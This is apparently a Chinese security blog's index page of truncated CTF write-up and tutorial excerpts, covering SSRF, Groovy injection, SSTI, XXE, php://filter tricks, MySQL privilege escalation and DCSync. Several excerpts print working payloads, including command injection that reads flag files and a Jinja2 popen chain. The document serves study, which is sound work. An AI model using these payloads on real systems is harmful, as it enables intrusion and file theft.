Web 396-401 url=http://1/1;echo `ls`>a.txturl=http://1/1;echo `cat fl0g.php`>a.txt 具体函数研究可以看过去文章 Web 402 url=file://1/1;echo `cat fl0g.php`>a.txt 简单一看 <?php$url = 'file://1/1;echo `cat fl0…

赛后拿wp来学习分析 主要是一个请求处理的差异 const { FLAG, SECRET } = process.env;const PORT = 3000;const app = express();app.use(express.urlencoded({ extended: true }));​​const sleep = d => new Promise(r => setTime…

web easyGooGooVVVY 描述 高松灯是一名java安全初学者，最近她在看groovy表达式注入。。。 搜文章去看了groovy表达式注入，没利用成功 可以打反射或者命令注入 def pb = new ProcessBuilder('printenv')def proc = pb.start()proc.waitFor()def stream = proc.getInputStream…

Java反射是一个强大的特性，允许程序在运行时查询，访问和修改类，接口，字段和方法的信息 反射提供了一种动态操作类的能力，通过这种机制能够在运行时获得类的信息，并且运行时修改类的结构，调用类的方法，实例化对象等 先来个例子 import java.util.*;import java.lang.reflect.*;​class Dog {   public void cry() { &n…

web361 简单测试一遍 ?name={{7*7}} 回显49证明存在SSTI，是jiaji 无过滤直接上payload吧 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__["popen"]("cat /flag").read()}} 多写几个payload ?name={{lipsum.__glob…

XXE漏洞概述 XXE：全称为XML Enternal Entity Injection，中文名称：XML外部实体注入 XXE漏洞原理 漏洞成因：解析时未对XML外部实体加以限制，导致攻击者将恶意代码注入到XML中，导致服务器加载恶意的外部实体引发文件读取，SSRF，命令执行等危害操作 特征：在HTTP的Request报文出现一下请求报文，即表明此时是采用XML进行数据传输，就可以测试是否存在XM…

baby layout 下载源码： /index.jsimport express from 'express';import session from 'express-session';import rateLimit from 'express-rate-limit';import { randomBytes } from 'crypto';import createDOMPurify fr…

file_put_contents($filename,”<?php exit();”.$content); 前提就是$filename和$content可控 相对简单来说就是要把<? php exit();给干掉 所以我们要利用php://filter协议可以写入文件 那么原理是什么呢？ 通过伪协议把文件当作文本流、非 PHP 代码、压缩文件等其他形式解析，从而避免 PHP 正常解析…

有师傅问到我相关的问题，我也正好来研究一下 首先了解一下 MySQL数据库提权思路 检测数据库存在，探测端口 获得数据库的权限密码 查看数据库类型 其中获取密码是账号密码是关键 其中拿到权限的方法基本就这几种 3306弱口令爆破 sqlmap的-sql-shell模式 网站的数据库配置文件 1day漏洞获取权限 在我自己的理解就是，利用数据库去提权到服务器 简单来说，就是得先有数据库的访问权限才可…

前言 DCSync是域渗透中经常会用到的 是利用Active Directory（AD）域控制器的复制协议来提取域内用户hash的攻击方式 前置知识 主要需要了解一下内网的工作环境 域 分类：单域、子域、父域、域树、域森林、DNS域名服务器 其中域，是一个有安全边界的计算机组合（集中管理网络资源的逻辑边界） 在一个域里： 所有计算机、用户、打印机、文件服务器等资源都被集中管理 域里有一个或多个“域…